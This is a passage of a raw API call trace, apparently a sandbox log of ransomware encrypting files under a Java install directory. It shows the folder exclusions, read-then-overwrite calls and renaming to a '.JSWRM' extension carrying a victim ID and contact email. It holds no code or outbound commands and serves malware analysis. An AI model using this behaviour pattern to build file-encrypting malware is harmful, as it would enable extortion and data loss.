cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0069.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0069.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.986] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_zh_TW.properties", cAlternateFileName="MECC18~1.PRO")) returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2=".") returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="..") returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="...") returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="windows") returned -1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="recovery") returned -1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="perflogs") returned -1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="documents and settings") returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="system volume information") returned -1 [0069.986] lstrcmpiW (lpString1="messages_zh_TW.properties", lpString2="msocache") returned -1 [0069.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_TW.properties", lpUsedDefaultChar=0x0) returned 25 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x241218, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_TW.properties", lpUsedDefaultChar=0x0) returned 25 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.987] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.987] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3752) returned 1 [0069.987] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x24e1e0 [0069.987] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0069.988] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.988] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0069.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.989] CloseHandle (hObject=0x458) returned 1 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0069.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0069.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0069.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0069.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.990] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x218e, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="splash.gif", cAlternateFileName="")) returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2=".") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="..") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="...") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="windows") returned -1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="recovery") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="perflogs") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="documents and settings") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="$RECYCLE.BIN") returned 1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="system volume information") returned -1 [0069.990] lstrcmpiW (lpString1="splash.gif", lpString2="msocache") returned 1 [0069.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash.gif", lpUsedDefaultChar=0x0) returned 10 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash.gif", lpUsedDefaultChar=0x0) returned 10 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.990] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.991] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8590) returned 1 [0069.991] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2180) returned 0x24e1e0 [0069.991] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x2180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x2180, lpOverlapped=0x0) returned 1 [0070.018] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.018] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x2180, lpOverlapped=0x0) returned 1 [0070.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.018] CloseHandle (hObject=0x458) returned 1 [0070.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0070.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0070.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0070.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0070.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.019] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.019] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bac, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="splash@2x.gif", cAlternateFileName="SPLASH~1.GIF")) returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2=".") returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="..") returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="...") returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="windows") returned -1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="recovery") returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="perflogs") returned 1 [0070.019] lstrcmpiW (lpString1="splash@2x.gif", lpString2="documents and settings") returned 1 [0070.020] lstrcmpiW (lpString1="splash@2x.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.020] lstrcmpiW (lpString1="splash@2x.gif", lpString2="system volume information") returned -1 [0070.020] lstrcmpiW (lpString1="splash@2x.gif", lpString2="msocache") returned 1 [0070.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash@2x.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash@2x.gif", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash@2x.gif", lpUsedDefaultChar=0x0) returned 13 [0070.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash@2x.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash@2x.gif", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash@2x.gif", lpUsedDefaultChar=0x0) returned 13 [0070.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0070.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0070.020] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.021] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15276) returned 1 [0070.021] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ba0) returned 0x24e1e0 [0070.021] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x3ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x3ba0, lpOverlapped=0x0) returned 1 [0070.023] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.023] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x3ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x3ba0, lpOverlapped=0x0) returned 1 [0070.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.023] CloseHandle (hObject=0x458) returned 1 [0070.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0070.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.024] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.024] HeapFree (in: 